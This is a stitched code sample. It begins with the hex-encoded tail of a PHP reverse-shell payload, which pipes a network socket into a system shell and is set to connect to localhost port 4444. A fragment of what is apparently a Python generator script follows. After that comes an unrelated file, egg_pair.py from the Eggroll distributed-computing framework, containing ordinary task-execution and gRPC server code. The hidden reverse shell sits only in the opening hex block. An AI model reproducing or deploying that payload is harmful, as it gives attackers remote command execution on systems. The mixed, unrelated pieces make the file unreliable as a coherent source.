2020202020202020202f2f20636865636b20666f7220656e642d6f662d66696c65206f6e205354444f5554206f722069662070726f63657373206973207374696c6c2072756e6e696e670a202020202020202020202020202020202020202020202020202020206563686f202250524f435f4552524f523a205368656c6c2070726f6365737320686173206265656e207465726d696e617465645c6e223b202020627265616b3b202f2f2066656f66282920646f6573206e6f7420776f726b207769746820626c6f636b696e672073747265616d730a2020202020202020202020202020202020202020202020207d20202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202f2f207573652070726f635f6765745f737461747573282920696e73746561640a2020202020202020202020202020202020202020202020202473747265616d73203d206172726179280a202020202020202020202020202020202020202020202020202020202772656164272020203d3e2061727261792824736f636b65742c202470697065735b315d2c202470697065735b325d292c202f2f20534f434b4554207c205354444f5554207c205354444552520a202020202020202020202020202020202020202020202020202020202777726974652720203d3e206e756c6c2c0a202020202020202020202020202020202020202020202020202020202765786365707427203d3e206e756c6c0a202020202020202020202020202020202020202020202020293b0a202020202020202020202020202020202020202020202020246e756d5f6368616e6765645f73747265616d73203d204073747265616d5f73656c656374282473747265616d735b2772656164275d2c202473747265616d735b277772697465275d2c202473747265616d735b27657863657074275d2c2030293b202f2f207761697420666f722073747265616d206368616e676573207c2077696c6c206e6f742077616974206f6e2057696e646f7773204f530a20202020202020202020202020202020202020202020202069662028246e756d5f6368616e6765645f73747265616d73203d3d3d2066616c736529207b0a202020202020202020202020202020202020202020202020202020206563686f20225354524d5f4552524f523a2073747265616d5f73656c6563742829206661696c65645c6e223b20627265616b3b0a2020202020202020202020202020202020202020202020207d20656c73652069662028246e756d5f6368616e6765645f73747265616d73203e203029207b0a202020202020202020202020202020202020202020202020202020206966202824746869732d3e6f73203d3d3d20274c494e55582729207b0a202020202020202020202020202020202020202020202020202020202020202069662028696e5f61727261792824736f636b657420202c202473747265616d735b2772656164275d2929207b2024746869732d3e72772824736f636b657420202c202470697065735b305d2c2027534f434b4554272c2027535444494e2720293b207d202f2f20726561642066726f6d20534f434b455420616e6420777269746520746f20535444494e0a202020202020202020202020202020202020202020202020202020202020202069662028696e5f6172726179282470697065735b325d2c202473747265616d735b2772656164275d2929207b2024746869732d3e7277282470697065735b325d2c2024736f636b657420202c2027535444455252272c2027534f434b455427293b207d202f2f20726561642066726f6d2053544445525220616e6420777269746520746f20534f434b45540a202020202020202020202020202020202020202020202020202020202020202069662028696e5f6172726179282470697065735b315d2c202473747265616d735b2772656164275d2929207b2024746869732d3e7277282470697065735b315d2c2024736f636b657420202c20275354444f5554272c2027534f434b455427293b207d202f2f20726561642066726f6d205354444f555420616e6420777269746520746f20534f434b45540a202020202020202020202020202020202020202020202020202020207d20656c7365206966202824746869732d3e6f73203d3d3d202757494e444f57532729207b0a20202020202020202020202020202020202020202020202020202020202020202f2f206f7264657220697320696d706f7274616e740a202020202020202020202020202020202020202020202020202020202020202069662028696e5f61727261792824736f636b65742c202473747265616d735b2772656164275d292f2a2d2d2d2d2d2d2a2f29207b2024746869732d3e7277202824736f636b657420202c202470697065735b305d2c2027534f434b4554272c2027535444494e2720293b207d202f2f20726561642066726f6d20534f434b455420616e6420777269746520746f20535444494e0a20202020202020202020202020202020202020202020202020202020202020206966202828246673746174203d206673746174282470697065735b325d2929202626202466737461745b2773697a65275d29207b2024746869732d3e627277282470697065735b325d2c2024736f636b657420202c2027535444455252272c2027534f434b455427293b207d202f2f20726561642066726f6d2053544445525220616e6420777269746520746f20534f434b45540a20202020202020202020202020202020202020202020202020202020202020206966202828246673746174203d206673746174282470697065735b315d2929202626202466737461745b2773697a65275d29207b2024746869732d3e627277282470697065735b315d2c2024736f636b657420202c20275354444f5554272c2027534f434b455427293b207d202f2f20726561642066726f6d205354444f555420616e6420777269746520746f20534f434b45540a202020202020202020202020202020202020202020202020202020207d0a2020202020202020202020202020202020202020202020207d0a20202020202020202020202020202020202020207d207768696c6520282124746869732d3e6572726f72293b0a20202020202020202020202020202020202020202f2f202d2d2d2d2d2d20574f524b20454e44202d2d2d2d2d2d0a0a2020202020202020202020202020202020202020666f7265616368202824706970657320617320247069706529207b0a20202020202020202020202020202020202020202020202066636c6f7365282470697065293b0a20202020202020202020202020202020202020207d0a202020202020202020202020202020202020202070726f635f636c6f7365282470726f63657373293b0a202020202020202020202020202020207d0a202020202020202020202020202020202f2f202d2d2d2d2d2d205348454c4c20454e44202d2d2d2d2d2d0a0a2020202020202020202020202020202066636c6f73652824736f636b6574293b0a2020202020202020202020207d0a2020202020202020202020202f2f202d2d2d2d2d2d20534f434b455420454e44202d2d2d2d2d2d0a0a20202020202020207d0a202020207d0a7d0a6563686f20273c7072653e273b0a2f2f206368616e67652074686520686f7374206164647265737320616e642f6f7220706f7274206e756d626572206173206e65636573736172790a247368203d206e6577205368656c6c28276c6f63616c686f7374272c2034343434293b0a2473682d3e72756e28293b0a756e73657428247368293b0a2f2f206761726261676520636f6c6c6563746f72207265717569726573205048502076352e332e30206f7220677265617465720a2f2f204067635f636f6c6c6563745f6379636c657328293b0a6563686f20273c2f7072653e273b0a3f3e'
if __name__ == '__main__':
main()
|
egg_pair.py | # -*- coding: utf-8 -*-
# Copyright (c) 2019 - now, Eggroll Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import configparser
import gc
import logging
import os
import platform
import shutil
import signal
import threading
import time
import mmh3
from collections.abc import Iterable
import grpc
import numpy as np
from eggroll.core.client import ClusterManagerClient
from eggroll.core.command.command_router import CommandRouter
from eggroll.core.command.command_service import CommandServicer
from eggroll.core.conf_keys import SessionConfKeys, \
ClusterManagerConfKeys, RollPairConfKeys, CoreConfKeys
from eggroll.core.constants import ProcessorTypes, ProcessorStatus, SerdesTypes
from eggroll.core.datastructure import create_executor_pool
from eggroll.core.datastructure.broker import FifoBroker
from eggroll.core.grpc.factory import GrpcChannelFactory
from eggroll.core.meta_model import ErPair
from eggroll.core.meta_model import ErTask, ErProcessor, ErEndpoint
from eggroll.core.proto import command_pb2_grpc, transfer_pb2_grpc
from eggroll.core.transfer.transfer_service import GrpcTransferServicer, \
TransferService
from eggroll.core.utils import _exception_logger, add_runtime_storage
from eggroll.core.utils import hash_code
from eggroll.core.utils import set_static_er_conf, get_static_er_conf
from eggroll.roll_pair import create_adapter, create_serdes, create_functor
from eggroll.roll_pair.task.storage import PutBatchTask
from eggroll.roll_pair.transfer_pair import BatchBroker
from eggroll.roll_pair.transfer_pair import TransferPair
from eggroll.roll_pair.utils.pair_utils import generator, partitioner, \
set_data_dir
from eggroll.utils.log_utils import get_logger
from eggroll.utils.profile import get_system_metric
L = get_logger()
class EggPair(object):
def __init__(self):
self.functor_serdes = create_serdes(SerdesTypes.CLOUD_PICKLE)
def __partitioner(self, hash_func, total_partitions):
return lambda k: hash_func(k) % total_partitions
def _run_unary(self, func, task, shuffle=False, reduce_op=None):
input_store_head = task._job._inputs[0]
output_store_head = task._job._outputs[0]
input_key_serdes = create_serdes(input_store_head._store_locator._serdes)
input_value_serdes = create_serdes(input_store_head._store_locator._serdes)
output_key_serdes = create_serdes(output_store_head._store_locator._serdes)
output_value_serdes = create_serdes(output_store_head._store_locator._serdes)
if input_key_serdes != output_key_serdes or \
input_value_serdes != output_value_serdes:
raise ValueError(f"input key-value serdes:{(input_key_serdes, input_value_serdes)}"
f"differ from output key-value serdes:{(output_key_serdes, output_value_serdes)}")
if shuffle:
from eggroll.roll_pair.transfer_pair import TransferPair
input_total_partitions = input_store_head._store_locator._total_partitions
output_total_partitions = output_store_head._store_locator._total_partitions
output_store = output_store_head
my_server_node_id = get_static_er_conf().get('server_node_id', None)
shuffler = TransferPair(transfer_id=task._job._id)
if not task._outputs or \
(my_server_node_id is not None
and my_server_node_id != task._outputs[0]._processor._server_node_id):
store_future = None
else:
store_future = shuffler.store_broker(
store_partition=task._outputs[0],
is_shuffle=True,
total_writers=input_total_partitions,
reduce_op=reduce_op)
if not task._inputs or \
(my_server_node_id is not None
and my_server_node_id != task._inputs[0]._processor._server_node_id):
scatter_future = None
else:
shuffle_broker = FifoBroker()
write_bb = BatchBroker(shuffle_broker)
try:
scatter_future = shuffler.scatter(
input_broker=shuffle_broker,
partition_function=partitioner(hash_func=mmh3.hash, total_partitions=output_total_partitions),
output_store=output_store)
with create_adapter(task._inputs[0]) as input_db, \
input_db.iteritems() as rb:
func(rb, input_key_serdes, input_value_serdes, write_bb)
finally:
write_bb.signal_write_finish()
if scatter_future:
scatter_results = scatter_future.result()
else:
scatter_results = 'no scatter for this partition'
if store_future:
store_results = store_future.result()
else:
store_results = 'no store for this partition'
else: # no shuffle
with create_adapter(task._inputs[0]) as input_db, \
input_db.iteritems() as rb, \
create_adapter(task._outputs[0], options=task._job._options) as db, \
db.new_batch() as wb:
func(rb, input_key_serdes, input_value_serdes, wb)
L.trace(f"close_store_adatper:{task._inputs[0]}")
def _run_binary(self, func, task):
left_key_serdes = create_serdes(task._inputs[0]._store_locator._serdes)
left_value_serdes = create_serdes(task._inputs[0]._store_locator._serdes)
right_key_serdes = create_serdes(task._inputs[1]._store_locator._serdes)
right_value_serdes = create_serdes(task._inputs[1]._store_locator._serdes)
output_key_serdes = create_serdes(task._outputs[0]._store_locator._serdes)
output_value_serdes = create_serdes(task._outputs[0]._store_locator._serdes)
if left_key_serdes != output_key_serdes or \
left_value_serdes != output_value_serdes:
raise ValueError(f"input key-value serdes:{(left_key_serdes, left_value_serdes)}"
f"differ from output key-value serdes:{(output_key_serdes, output_value_serdes)}")
with create_adapter(task._inputs[0]) as left_adapter, \
create_adapter(task._inputs[1]) as right_adapter, \
create_adapter(task._outputs[0]) as output_adapter, \
left_adapter.iteritems() as left_iterator, \
right_adapter.iteritems() as right_iterator, \
output_adapter.new_batch() as output_writebatch:
try:
func(left_iterator, left_key_serdes, left_value_serdes,
right_iterator, right_key_serdes, right_value_serdes,
output_writebatch)
except Exception as e:
raise EnvironmentError("exec task:{} error".format(task), e)
@_exception_logger
def run_task(self, task: ErTask):
if L.isEnabledFor(logging.TRACE):
L.trace(
f'[RUNTASK] start. task_name={task._name}, inputs={task._inputs}, outputs={task._outputs}, task_id={task._id}')
else:
L.debug(f'[RUNTASK] start. task_name={task._name}, task_id={task._id}')
functors = task._job._functors
result = task
if task._name == 'get':
# TODO:1: move to create_serdes
f = create_functor(functors[0]._body)
with create_adapter(task._inputs[0]) as input_adapter:
L.trace(f"get: key: {self.functor_serdes.deserialize(f._key)}, path: {input_adapter.path}")
value = input_adapter.get(f._key)
result = ErPair(key=f._key, value=value)
elif task._name == 'getAll':
tag = f'{task._id}'
er_pair = create_functor(functors[0]._body)
input_store_head = task._job._inputs[0]
key_serdes = create_serdes(input_store_head._store_locator._serdes)
def generate_broker():
with create_adapter(task._inputs[0]) as db, db.iteritems() as rb:
limit = None if er_pair._key is None else key_serdes.deserialize(er_pair._key)
try:
yield from TransferPair.pair_to_bin_batch(rb, limit=limit)
finally:
TransferService.remove_broker(tag)
TransferService.set_broker(tag, generate_broker())
elif task._name == 'count':
with create_adapter(task._inputs[0]) as input_adapter:
result = ErPair(key=self.functor_serdes.serialize('result'),
value=self.functor_serdes.serialize(input_adapter.count()))
elif task._name == 'putBatch':
partition = task._outputs[0]
tag = f'{task._id}'
PutBatchTask(tag, partition).run()
elif task._name == 'putAll':
output_partition = task._outputs[0]
tag = f'{task._id}'
L.trace(f'egg_pair putAll: transfer service tag={tag}')
tf = TransferPair(tag)
store_broker_result = tf.store_broker(output_partition, False).result()
# TODO:2: should wait complete?, command timeout?
elif task._name == 'put':
f = create_functor(functors[0]._body)
with create_adapter(task._inputs[0]) as input_adapter:
value = input_adapter.put(f._key, f._value)
# result = ErPair(key=f._key, value=bytes(value))
elif task._name == 'destroy':
input_store_locator = task._inputs[0]._store_locator
namespace = input_store_locator._namespace
name = input_store_locator._name
store_type = input_store_locator._store_type
L.debug(f'destroying store_type={store_type}, namespace={namespace}, name={name}')
if name == '*':
from eggroll.roll_pair.utils.pair_utils import get_db_path, get_data_dir
target_paths = list()
if store_type == '*':
data_dir = get_data_dir()
store_types = os.listdir(data_dir)
for store_type in store_types:
target_paths.append('/'.join([data_dir, store_type, namespace]))
else:
db_path = get_db_path(task._inputs[0])
target_paths.append(db_path[:db_path.rfind('*')])
real_data_dir = os.path.realpath(get_data_dir())
for path in target_paths:
realpath = os.path.realpath(path)
if os.path.exists(path):
if realpath == "/" \
or realpath == real_data_dir \
or not realpath.startswith(real_data_dir):
raise ValueError(f'trying to delete a dangerous path: {realpath}')
else:
shutil.rmtree(path)
else:
options = task._job._options
with create_adapter(task._inputs[0], options=options) as input_adapter:
input_adapter.destroy(options=options)
elif task._name == 'delete':
f = create_functor(functors[0]._body)
with create_adapter(task._inputs[0]) as input_adapter:
if input_adapter.delete(f._key):
L.trace("delete k success")
elif task._name == 'mapValues':
f = create_functor(functors[0]._body)
def map_values_wrapper(input_iterator, key_serdes, value_serdes, output_writebatch):
for k_bytes, v_bytes in input_iterator:
v = value_serdes.deserialize(v_bytes)
output_writebatch.put(k_bytes, value_serdes.serialize(f(v)))
self._run_unary(map_values_wrapper, task)
elif task._name == 'map':
f = create_functor(functors[0]._body)
def map_wrapper(input_iterator, key_serdes, value_serdes, shuffle_broker):
for k_bytes, v_bytes in input_iterator:
k1, v1 = f(key_serdes.deserialize(k_bytes), value_serdes.deserialize(v_bytes))
shuffle_broker.put((key_serdes.serialize(k1), value_serdes.serialize(v1)))
self._run_unary(map_wrapper, task, shuffle=True)
elif task._name == 'reduce':
seq_op_result = self.aggregate_seq(task=task)
result = ErPair(key=self.functor_serdes.serialize(task._inputs[0]._id),
value=self.functor_serdes.serialize(seq_op_result))
elif task._name == 'aggregate':
seq_op_result = self.aggregate_seq(task=task)
result = ErPair(key=self.functor_serdes.serialize(task._inputs[0]._id),
value=self.functor_serdes.serialize(seq_op_result))
elif task._name == 'mapPartitions':
reduce_op = create_functor(functors[1]._body)
shuffle = create_functor(functors[2]._body)
def map_partitions_wrapper(input_iterator, key_serdes, value_serdes, output_writebatch):
f = create_functor(functors[0]._body)
value = f(generator(key_serdes, value_serdes, input_iterator))
if isinstance(value, Iterable):
for k1, v1 in value:
if shuffle:
output_writebatch.put((key_serdes.serialize(k1), value_serdes.serialize(v1)))
else:
output_writebatch.put(key_serdes.serialize(k1), value_serdes.serialize(v1))
else:
key = input_iterator.key()
output_writebatch.put((key, value_serdes.serialize(value)))
self._run_unary(map_partitions_wrapper, task, shuffle=shuffle, reduce_op=reduce_op)
elif task._name == 'collapsePartitions':
def collapse_partitions_wrapper(input_iterator, key_serdes, value_serdes, output_writebatch):
f = create_functor(functors[0]._body)
value = f(generator(key_serdes, value_serdes, input_iterator))
if input_iterator.last():
key = input_iterator.key()
output_writebatch.put(key, value_serdes.serialize(value))
self._run_unary(collapse_partitions_wrapper, task)
elif task._name == 'mapPartitionsWithIndex':
partition_id = task._inputs[0]._id
shuffle = create_functor(functors[1]._body)
def map_partitions_with_index_wrapper(input_iterator, key_serdes, value_serdes, output_writebatch):
f = create_functor(functors[0]._body)
value = f(partition_id, generator(key_serdes, value_serdes, input_iterator))
if isinstance(value, Iterable):
for k1, v1 in value:
if shuffle:
output_writebatch.put((key_serdes.serialize(k1), value_serdes.serialize(v1)))
else:
output_writebatch.put(key_serdes.serialize(k1), value_serdes.serialize(v1))
else:
key = input_iterator.key()
output_writebatch.put((key, value_serdes.serialize(value)))
self._run_unary(map_partitions_with_index_wrapper, task, shuffle=shuffle)
elif task._name == 'flatMap':
shuffle = create_functor(functors[1]._body)
def flat_map_wraaper(input_iterator, key_serdes, value_serdes, output_writebatch):
f = create_functor(functors[0]._body)
for k1, v1 in input_iterator:
for k2, v2 in f(key_serdes.deserialize(k1), value_serdes.deserialize(v1)):
if shuffle:
output_writebatch.put((key_serdes.serialize(k2), value_serdes.serialize(v2)))
else:
output_writebatch.put(key_serdes.serialize(k2), value_serdes.serialize(v2))
self._run_unary(flat_map_wraaper, task, shuffle=shuffle)
elif task._name == 'glom':
def glom_wrapper(input_iterator, key_serdes, value_serdes, output_writebatch):
k_tmp = None
v_list = []
for k, v in input_iterator:
v_list.append((key_serdes.deserialize(k), value_serdes.deserialize(v)))
k_tmp = k
if k_tmp is not None:
output_writebatch.put(k_tmp, value_serdes.serialize(v_list))
self._run_unary(glom_wrapper, task)
elif task._name == 'sample':
def sample_wrapper(input_iterator, key_serdes, value_serdes, output_writebatch):
fraction = create_functor(functors[0]._body)
seed = create_functor(functors[1]._body)
input_iterator.first()
random_state = np.random.RandomState(seed)
for k, v in input_iterator:
if random_state.rand() < fraction:
output_writebatch.put(k, v)
self._run_unary(sample_wrapper, task)
elif task._name == 'filter':
def filter_wrapper(input_iterator, key_serdes, value_serdes, output_writebatch):
f = create_functor(functors[0]._body)
for k, v in input_iterator:
if f(key_serdes.deserialize(k), value_serdes.deserialize(v)):
output_writebatch.put(k, v)
self._run_unary(filter_wrapper, task)
elif task._name == 'join':
def merge_join_wrapper(left_iterator, left_key_serdes, left_value_serdes,
right_iterator, right_key_serdes, right_value_serdes,
output_writebatch):
if not left_iterator.adapter.is_sorted() or not right_iterator.adapter.is_sorted():
raise RuntimeError(f"merge join cannot be applied: not both store types support sorting. "
f"left type: {type(left_iterator.adapter)}, is_sorted: {left_iterator.adapter.is_sorted()}; "
f"right type: {type(right_iterator.adapter)}, is_sorted: {right_iterator.adapter.is_sorted()}")
f = create_functor(functors[0]._body)
is_same_serdes = left_key_serdes == right_key_serdes
l_iter = iter(left_iterator)
r_iter = iter(right_iterator)
try:
k_left, v_left_bytes = next(l_iter)
k_right_raw, v_right_bytes = next(r_iter)
if is_same_serdes:
k_right = k_right_raw
else:
k_right = left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw))
while True:
while k_right < k_left:
k_right_raw, v_right_bytes = next(r_iter)
if is_same_serdes:
k_right = k_right_raw
else:
k_right = left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw))
while k_left < k_right:
k_left, v_left_bytes = next(l_iter)
if k_left == k_right:
output_writebatch.put(k_left,
left_value_serdes.serialize(
f(left_value_serdes.deserialize(v_left_bytes),
right_value_serdes.deserialize(v_right_bytes))))
k_left, v_left_bytes = next(l_iter)
# skips next(r_iter) to avoid duplicate codes for the 3rd time
except StopIteration as e:
return
def hash_join_wrapper(left_iterator, left_key_serdes, left_value_serdes,
right_iterator, right_key_serdes, right_value_serdes,
output_writebatch):
f = create_functor(functors[0]._body)
is_diff_serdes = type(left_key_serdes) != type(right_key_serdes)
for k_left, l_v_bytes in left_iterator:
if is_diff_serdes:
k_left = right_key_serdes.serialize(left_key_serdes.deserialize(k_left))
r_v_bytes = right_iterator.adapter.get(k_left)
if r_v_bytes:
output_writebatch.put(k_left,
left_value_serdes.serialize(
f(left_value_serdes.deserialize(l_v_bytes),
right_value_serdes.deserialize(r_v_bytes))))
join_type = task._job._options.get('join_type', 'merge')
if join_type == 'merge':
self._run_binary(merge_join_wrapper, task)
else:
self._run_binary(hash_join_wrapper, task)
elif task._name == 'subtractByKey':
def merge_subtract_by_key_wrapper(left_iterator, left_key_serdes, left_value_serdes,
right_iterator, right_key_serdes, right_value_serdes,
output_writebatch):
if not left_iterator.adapter.is_sorted() or not right_iterator.adapter.is_sorted():
raise RuntimeError(
f"merge subtract_by_key cannot be applied: not both store types support sorting. "
f"left type: {type(left_iterator.adapter)}, is_sorted: {left_iterator.adapter.is_sorted()}; "
f"right type: {type(right_iterator.adapter)}, is_sorted: {right_iterator.adapter.is_sorted()}")
is_same_serdes = left_key_serdes == right_key_serdes
l_iter = iter(left_iterator)
r_iter = iter(right_iterator)
is_left_stopped = False
is_equal = False
try:
k_left, v_left = next(l_iter)
except StopIteration:
is_left_stopped = True
k_left = None
v_left = None
try:
k_right_raw, v_right = next(r_iter)
except StopIteration:
is_left_stopped = False
k_right_raw = None
v_right = None
# left is None, output must be None
if k_left is None:
return
try:
if k_left is None:
raise StopIteration()
if k_right_raw is None:
raise StopIteration()
if is_same_serdes:
k_right = k_right_raw
else:
k_right = left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw))
while True:
is_left_stopped = False
if k_left < k_right:
output_writebatch.put(k_left, v_left)
k_left, v_left = next(l_iter)
is_left_stopped = True
elif k_left == k_right:
is_equal = True
is_left_stopped = True
k_left, v_left = next(l_iter)
is_left_stopped = False
is_equal = False
k_right_raw, v_right = next(r_iter)
k_right = left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw))
else:
k_right_raw, v_right = next(r_iter)
k_right = left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw))
is_left_stopped = True
except StopIteration as e:
pass
if not is_left_stopped and not is_equal:
try:
if k_left is not None and v_left is not None:
output_writebatch.put(k_left, v_left)
while True:
k_left, v_left = next(l_iter)
output_writebatch.put(k_left, v_left)
except StopIteration as e:
pass
elif is_left_stopped and not is_equal and k_left is not None:
output_writebatch.put(k_left, v_left)
return
def hash_subtract_by_key_wrapper(left_iterator, left_key_serdes, left_value_serdes,
right_iterator, right_key_serdes, right_value_serdes,
output_writebatch):
is_diff_serdes = type(left_key_serdes) != type(right_key_serdes)
for k_left, v_left in left_iterator:
if is_diff_serdes:
k_left = right_key_serdes.serialize(left_key_serdes.deserialize(k_left))
v_right = right_iterator.adapter.get(k_left)
if v_right is None:
output_writebatch.put(k_left, v_left)
subtract_by_key_type = task._job._options.get('subtract_by_key_type', 'merge')
if subtract_by_key_type == 'merge':
self._run_binary(merge_subtract_by_key_wrapper, task)
else:
self._run_binary(hash_subtract_by_key_wrapper, task)
elif task._name == 'union':
def merge_union_wrapper(left_iterator, left_key_serdes, left_value_serdes,
right_iterator, right_key_serdes, right_value_serdes,
output_writebatch):
if not left_iterator.adapter.is_sorted() or not right_iterator.adapter.is_sorted():
raise RuntimeError(f"merge union cannot be applied: not both store types support sorting. "
f"left type: {type(left_iterator.adapter)}, is_sorted: {left_iterator.adapter.is_sorted()}; "
f"right type: {type(right_iterator.adapter)}, is_sorted: {right_iterator.adapter.is_sorted()}")
f = create_functor(functors[0]._body)
is_same_serdes = left_key_serdes == right_key_serdes
l_iter = iter(left_iterator)
r_iter = iter(right_iterator)
k_left = None
v_left_bytes = None
k_right = None
v_right_bytes = None
none_none = (None, None)
is_left_stopped = False
is_equal = False
try:
k_left, v_left_bytes = next(l_iter, none_none)
k_right_raw, v_right_bytes = next(r_iter, none_none)
if k_left is None and k_right_raw is None:
return
elif k_left is None:
is_left_stopped = True
raise StopIteration()
elif k_right_raw is None:
is_left_stopped = False
raise StopIteration()
if is_same_serdes:
k_right = k_right_raw
else:
k_right = left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw))
while True:
is_left_stopped = False
while k_right < k_left:
if is_same_serdes:
output_writebatch.put(k_right, v_right_bytes)
else:
output_writebatch.put(k_right, left_value_serdes.serialize(
right_value_serdes.deserialize(v_right_bytes)))
k_right_raw, v_right_bytes = next(r_iter)
if is_same_serdes:
k_right = k_right_raw
else:
k_right = left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw))
is_left_stopped = True
while k_left < k_right:
output_writebatch.put(k_left, v_left_bytes)
k_left, v_left_bytes = next(l_iter)
if k_left == k_right:
is_equal = True
output_writebatch.put(k_left,
left_value_serdes.serialize(
f(left_value_serdes.deserialize(v_left_bytes),
right_value_serdes.deserialize(v_right_bytes))))
is_left_stopped = True
k_left, v_left_bytes = next(l_iter)
is_left_stopped = False
k_right_raw, v_right_bytes = next(r_iter)
if is_same_serdes:
k_right = k_right_raw
else:
k_right = left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw))
is_equal = False
except StopIteration as e:
pass
if not is_left_stopped:
try:
output_writebatch.put(k_left, v_left_bytes)
while True:
k_left, v_left_bytes = next(l_iter)
output_writebatch.put(k_left, v_left_bytes)
except StopIteration as e:
pass
else:
try:
if not is_equal:
if is_same_serdes:
output_writebatch.put(k_right_raw, v_right_bytes)
else:
output_writebatch.put(
left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw)),
left_value_serdes.serialize(right_value_serdes.deserialize(v_right_bytes)))
while True:
k_right_raw, v_right_bytes = next(r_iter)
if is_same_serdes:
output_writebatch.put(k_right_raw, v_right_bytes)
else:
output_writebatch.put(
left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw)),
left_value_serdes.serialize(right_value_serdes.deserialize(v_right_bytes)))
except StopIteration as e:
pass
# end of merge union wrapper
return
def hash_union_wrapper(left_iterator, left_key_serdes, left_value_serdes,
right_iterator, right_key_serdes, right_value_serdes,
output_writebatch):
f = create_functor(functors[0]._body)
is_diff_serdes = type(left_key_serdes) != type(right_key_serdes)
for k_left, v_left in left_iterator:
if is_diff_serdes:
k_left = right_key_serdes.serialize(left_key_serdes.deserialize(k_left))
v_right = right_iterator.adapter.get(k_left)
if v_right is None:
output_writebatch.put(k_left, v_left)
else:
v_final = f(left_value_serdes.deserialize(v_left),
right_value_serdes.deserialize(v_right))
output_writebatch.put(k_left, left_value_serdes.serialize(v_final))
right_iterator.first()
for k_right, v_right in right_iterator:
if is_diff_serdes:
final_v_bytes = output_writebatch.get(left_key_serdes.serialize(
right_key_serdes.deserialize(k_right)))
else:
final_v_bytes = output_writebatch.get(k_right)
if final_v_bytes is None:
output_writebatch.put(k_right, v_right)
union_type = task._job._options.get('union_type', 'merge')
if union_type == 'merge':
self._run_binary(merge_union_wrapper, task)
else:
self._run_binary(hash_union_wrapper, task)
elif task._name == 'withStores':
f = create_functor(functors[0]._body)
result = ErPair(key=self.functor_serdes.serialize(task._inputs[0]._id),
value=self.functor_serdes.serialize(f(task)))
if L.isEnabledFor(logging.TRACE):
L.trace(
f'[RUNTASK] end. task_name={task._name}, inputs={task._inputs}, outputs={task._outputs}, task_id={task._id}')
else:
L.debug(f'[RUNTASK] end. task_name={task._name}, task_id={task._id}')
return result
# run_task ends here
def aggregate_seq(self, task: ErTask):
functors = task._job._functors
is_reduce = functors[0]._name == 'reduce'
zero_value = None if is_reduce or functors[0] is None else create_functor(functors[0]._body)
if is_reduce:
seq_op = create_functor(functors[0]._body)
else:
seq_op = create_functor(functors[1]._body)
first = True
seq_op_result = zero_value
input_partition = task._inputs[0]
input_key_serdes = create_serdes(input_partition._store_locator._serdes)
input_value_serdes = input_key_serdes
with create_adapter(input_partition) as input_adapter, \
input_adapter.iteritems() as input_iter:
for k_bytes, v_bytes in input_iter:
v = input_value_serdes.deserialize(v_bytes)
if is_reduce and first:
seq_op_result = v
first = False
else:
seq_op_result = seq_op(seq_op_result, v)
return seq_op_result
def stop_processor(cluster_manager_client: ClusterManagerClient, myself: ErProcessor):
import win32file
import win32pipe
L.info(f"stop_processor pid:{os.getpid()}, ppid:{os.getppid()}")
pipe_name = r'\\.\pipe\pid_pipe' + str(os.getpid())
pipe_buffer_size = 1024
while True:
named_pipe = win32pipe.CreateNamedPipe(pipe_name,
win32pipe.PIPE_ACCESS_DUPLEX,
win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_WAIT | win32pipe.PIPE_READMODE_MESSAGE,
win32pipe.PIPE_UNLIMITED_INSTANCES,
pipe_buffer_size,
pipe_buffer_size, 500, None)
try:
while True:
try:
win32pipe.ConnectNamedPipe(named_pipe, None)
data = win32file.ReadFile(named_pipe, pipe_buffer_size, None)
if data is None or len(data) < 2:
continue
print('receive msg:', data)
cmd_str = data[1].decode('utf-8')
if 'stop' in cmd_str and str(os.getpid()) in cmd_str:
myself._status = ProcessorStatus.STOPPED
cluster_manager_client.heartbeat(myself)
except BaseException as e:
print("exception:", e)
break
finally:
try:
win32pipe.DisconnectNamedPipe(named_pipe)
except:
pass
def serve(args):
prefix = 'v1/egg-pair'
set_data_dir(args.data_dir)
CommandRouter.get_instance().register(
service_name=f"{prefix}/runTask",
route_to_module_name="eggroll.roll_pair.egg_pair",
route_to_class_name="EggPair",
route_to_method_name="run_task")
max_workers = int(RollPairConfKeys.EGGROLL_ROLLPAIR_EGGPAIR_SERVER_EXECUTOR_POOL_MAX_SIZE.get())
executor_pool_type = CoreConfKeys.EGGROLL_CORE_DEFAULT_EXECUTOR_POOL.get()
command_server = grpc.server(create_executor_pool(
canonical_name=executor_pool_type,
max_workers=max_workers,
thread_name_prefix="eggpair-command-server"),
options=[
("grpc.max_metadata_size",
int(CoreConfKeys.EGGROLL_CORE_GRPC_SERVER_CHANNEL_MAX_INBOUND_METADATA_SIZE.get())),
('grpc.max_send_message_length',
int(CoreConfKeys.EGGROLL_CORE_GRPC_SERVER_CHANNEL_MAX_INBOUND_MESSAGE_SIZE.get())),
('grpc.max_receive_message_length',
int(CoreConfKeys.EGGROLL_CORE_GRPC_SERVER_CHANNEL_MAX_INBOUND_MESSAGE_SIZE.get())),
('grpc.keepalive_time_ms', int(CoreConfKeys.CONFKEY_CORE_GRPC_CHANNEL_KEEPALIVE_TIME_SEC.get()) * 1000),
('grpc.keepalive_timeout_ms',
int(CoreConfKeys.CONFKEY_CORE_GRPC_SERVER_CHANNEL_KEEPALIVE_TIMEOUT_SEC.get()) * 1000),
('grpc.keepalive_permit_without_calls',
int(CoreConfKeys.CONFKEY_CORE_GRPC_SERVER_CHANNEL_KEEPALIVE_WITHOUT_CALLS_ENABLED.get())),
('grpc.per_rpc_retry_buffer_size',
int(CoreConfKeys.CONFKEY_CORE_GRPC_SERVER_CHANNEL_RETRY_BUFFER_SIZE.get())),
('grpc.so_reuseport', False)])
command_servicer = CommandServicer()
